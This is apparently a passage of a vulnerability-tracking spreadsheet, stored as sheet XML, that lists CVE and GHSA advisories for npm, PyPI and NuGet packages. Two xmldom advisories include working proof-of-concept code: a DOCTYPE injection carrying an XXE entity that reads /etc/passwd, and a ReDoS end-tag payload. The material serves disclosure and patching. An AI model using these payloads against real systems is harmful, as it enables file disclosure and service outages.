          <t>## Summary
An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.
## Details
`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.
### Root Cause
1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.
The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
## Affected Versions
Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```
## Impact
- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.
## Fix Applied
The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.
&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.
### Proof of Concept - fixed path
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```
### Why the default stays verbatim
The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.
### Residual limitation
The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t>
        </is>
      </c>
      <c r="T1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83619</t>
        </is>
      </c>
      <c r="D1065" s="5" t="inlineStr"/>
      <c r="E1065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1065" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1065" s="5" t="inlineStr">
        <is>
          <t>0.8.15</t>
        </is>
      </c>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1065" s="5" t="inlineStr"/>
      <c r="R1065" s="5" t="inlineStr"/>
      <c r="S1065" s="5" t="inlineStr">
        <is>
          <t>## Summary
On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.
## Details
`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:
- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120
```js
/[ \t\n\r]+$/g
```
Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.
## Proof of Concept
```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```
Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):
| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |
## Impact
Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.
## Affected Versions
Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).
## Fix Applied
Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.
## Severity note
The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t>
        </is>
      </c>
      <c r="T1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="D1066" s="5" t="inlineStr"/>
      <c r="E1066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1066" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>npm:svgo</t>
        </is>
      </c>
      <c r="M1066" s="5" t="inlineStr">
        <is>
          <t>2.8.4, 3.3.5, 4.1.0</t>
        </is>
      </c>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1066" s="5" t="inlineStr"/>
      <c r="R1066" s="5" t="inlineStr"/>
      <c r="S1066" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="D1067" s="5" t="inlineStr"/>
      <c r="E1067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1067" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr">
        <is>
          <t>npm:js-yaml</t>
        </is>
      </c>
      <c r="M1067" s="5" t="inlineStr">
        <is>
          <t>3.15.2, 4.3.2</t>
        </is>
      </c>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1067" s="5" t="inlineStr"/>
      <c r="R1067" s="5" t="inlineStr"/>
      <c r="S1067" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="D1068" s="5" t="inlineStr"/>
      <c r="E1068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1068" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr"/>
      <c r="L1068" s="5" t="inlineStr">
        <is>
          <t>PyPI:httpcore2, PyPI:httpx2</t>
        </is>
      </c>
      <c r="M1068" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1068" s="5" t="inlineStr"/>
      <c r="R1068" s="5" t="inlineStr"/>
      <c r="S1068"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T1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="D1069" s="5" t="inlineStr"/>
      <c r="E1069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1069" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr"/>
      <c r="L1069" s="5" t="inlineStr">
        <is>
          <t>PyPI:httpx2</t>
        </is>
      </c>
      <c r="M1069" s="5" t="inlineStr">
        <is>
          <t>2.12.0</t>
        </is>
      </c>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1069" s="5" t="inlineStr"/>
      <c r="R1069" s="5" t="inlineStr"/>
      <c r="S1069"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T1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84452</t>
        </is>
      </c>
      <c r="D1070" s="5" t="inlineStr"/>
      <c r="E1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1070" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr"/>
      <c r="L1070" s="5" t="inlineStr">
        <is>
          <t>PyPI:winml-cli</t>
        </is>
      </c>
      <c r="M1070" s="5" t="inlineStr">
        <is>
          <t>0.4.0</t>
        </is>
      </c>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1070" s="5" t="inlineStr"/>
      <c r="R1070" s="5" t="inlineStr"/>
      <c r="S1070"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T1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="D1071" s="5" t="inlineStr"/>
      <c r="E1071" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1071" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr">
        <is>
          <t>npm:maplibre-gl</t>
        </is>
      </c>
      <c r="M1071" s="5" t="inlineStr">
        <is>
          <t>6.4.1</t>
        </is>
      </c>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1071" s="5" t="inlineStr"/>
      <c r="R1071" s="5" t="inlineStr"/>
      <c r="S1071" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>GHSA-26w7-cxv4-gfx2</t>
        </is>
      </c>
      <c r="D1072" s="5" t="inlineStr"/>
      <c r="E1072" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1072" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="inlineStr"/>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr"/>
      <c r="L1072" s="5" t="inlineStr">
        <is>
          <t>npm:astro</t>
        </is>
      </c>
      <c r="M1072" s="5" t="inlineStr">
        <is>
          <t>7.2.8</t>
        </is>
      </c>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1072" s="5" t="inlineStr"/>
      <c r="R1072" s="5" t="inlineStr"/>
      <c r="S1072" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1072" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>GHSA-2q42-4q24-7rgv</t>
        </is>
      </c>
      <c r="D1073" s="5" t="inlineStr"/>
      <c r="E1073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1073" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="inlineStr"/>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr">
        <is>
          <t>npm:@typespec/compiler, npm:@typespec/openapi3</t>
        </is>
      </c>
      <c r="M1073" s="5" t="inlineStr"/>
      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1073" s="5" t="inlineStr"/>
      <c r="R1073" s="5" t="inlineStr"/>
      <c r="S1073" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1073" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>GHSA-2x7j-588g-ccc2</t>
        </is>
      </c>
      <c r="D1074" s="5" t="inlineStr"/>
      <c r="E1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1074" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="inlineStr"/>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr"/>
      <c r="L1074" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M1074" s="5" t="inlineStr">
        <is>
          <t>9.1.0</t>
        </is>
      </c>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1074" s="5" t="inlineStr"/>
      <c r="R1074" s="5" t="inlineStr"/>
      <c r="S1074" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1074" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>GHSA-2xp9-vwfh-vxw4</t>
        </is>
      </c>
      <c r="D1075" s="5" t="inlineStr"/>
      <c r="E1075" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1075" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="inlineStr"/>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr"/>
      <c r="L1075" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M1075" s="5" t="inlineStr">
        <is>
          <t>15.5.24, 16.3.3</t>
        </is>
      </c>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1075" s="5" t="inlineStr"/>
      <c r="R1075" s="5" t="inlineStr"/>
      <c r="S1075" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.
Until a fix has propagated, optimization of AVIF files is disabled.</t>
        </is>
      </c>
      <c r="T1075" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
      <c r="D1076" s="5" t="inlineStr"/>
      <c r="E1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1076" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="inlineStr"/>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr"/>
      <c r="L1076" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1076" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1076" s="5" t="inlineStr"/>
      <c r="R1076" s="5" t="inlineStr"/>
      <c r="S1076"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1076" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>GHSA-j95f-988m-3j2f</t>
        </is>
      </c>
      <c r="D1077" s="5" t="inlineStr"/>
      <c r="E1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1077" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="inlineStr"/>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr"/>
      <c r="L1077" s="5" t="inlineStr">
        <is>
          <t>npm:@tiptap/core</t>
        </is>
      </c>
      <c r="M1077" s="5" t="inlineStr">
        <is>
          <t>3.30.5</t>
        </is>
      </c>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1077" s="5" t="inlineStr"/>
      <c r="R1077" s="5" t="inlineStr"/>
      <c r="S1077" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1077" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>GHSA-mqvm-gmc4-6rv2</t>
